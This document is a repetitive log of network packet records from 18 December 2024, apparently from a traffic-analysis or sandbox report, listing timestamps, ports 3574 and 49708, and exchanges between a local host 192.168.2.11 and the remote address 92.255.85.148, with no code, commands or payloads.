                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.773341894 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.773384094 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.773458958 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.773550034 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.773641109 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.773688078 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.773705959 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.773755074 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.774468899 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.774573088 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.774660110 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.774782896 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.774797916 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.774974108 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.782757044 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.782779932 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.782989979 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.783026934 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.783041000 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.783178091 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.783190012 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.783209085 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.783248901 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.783298969 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.783307076 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.783350945 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.783526897 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.783545017 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.783607960 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.783624887 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.783648014 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.783658981 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.783848047 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.784033060 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.784060955 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.784158945 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.784216881 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.784259081 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.784281969 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.784332991 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.784401894 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.786858082 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.786878109 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.786904097 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.786920071 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.786926031 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.787039042 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.787964106 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.787985086 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.788059950 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.788599968 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.788640976 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.788697004 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.790206909 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.790625095 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.790643930 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.790740967 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.791069984 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.791117907 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.791842937 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.838546991 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.928030968 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.928333044 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.928349972 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.928384066 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.928864002 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.928910971 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.929639101 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.929934025 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.929975033 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.930603981 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.931035995 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.931091070 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.931535006 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.931552887 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.931591034 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.932668924 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.932683945 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.932734966 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.933758974 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.933850050 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.933892965 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.934686899 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.935086966 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.935131073 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.935746908 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.936290979 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.936340094 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.936872005 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.936886072 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.936933994 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.937899113 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.938452959 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.938500881 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.939018965 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.939035892 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.939074039 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.940032959 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.940047979 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.940094948 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.941045046 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.941231966 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.941273928 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.942101002 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.942384005 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.942424059 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.943232059 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.943243980 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.943284988 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.944281101 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.944293022 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.944345951 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.945276976 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.945612907 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.945678949 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.946418047 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.946611881 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.946646929 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.947411060 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.947426081 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.947468996 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.948456049 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.948582888 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.948626041 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.949548006 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.949559927 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.949601889 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.950643063 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.950654984 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.950695992 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.951651096 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.951932907 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.951977015 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.952743053 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.952874899 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.952918053 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.953783035 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.953794956 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.953830957 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.954988003 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.955003977 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.955044985 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.956063032 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.956079006 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.956116915 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.957026958 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.957039118 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.957077026 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.958153009 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.958167076 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.958203077 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.959088087 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.959167957 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.959209919 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.960133076 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.960148096 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.960202932 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.961287022 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.961302042 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.961337090 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.962272882 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.962376118 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.962418079 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.963304043 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.963350058 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.963399887 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.964399099 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.964413881 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.964457989 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.965418100 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.965523005 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.965565920 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.966593027 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.966876984 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.967576981 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.967595100 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.967608929 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.967679977 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.968646049 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.968799114 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.968842983 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.969679117 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.969871998 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.969918966 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.970839977 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.970853090 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.970896006 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.971796989 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.971810102 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.971863031 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.972913027 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.972932100 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.972973108 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.973911047 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.974072933 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.974123955 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.974986076 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.975045919 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.975091934 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.976058006 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.976605892 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.976650000 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.977323055 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.977335930 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.977379084 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.978315115 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.978374958 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.978415012 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.979176044 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.979290009 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.979327917 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.980328083 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.980565071 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.980609894 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.981389046 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.981978893 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.982027054 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.982451916 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.982604027 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.982646942 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:13.983438015 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.026053905 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.120332003 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.120615959 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.120671034 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.121076107 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.121100903 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.121135950 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.121944904 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.121963978 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.122010946 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.122958899 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.122980118 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.123028040 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.124135017 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.124335051 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.124378920 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.125135899 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.125149012 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.125195980 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.126131058 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.126142979 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.126295090 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.127300978 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.127332926 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.127374887 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.128298998 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.128313065 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.128354073 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.129498005 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.129630089 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.129676104 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.130508900 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:14.130822897 CET35744970892.255.85.148192.168.2.11
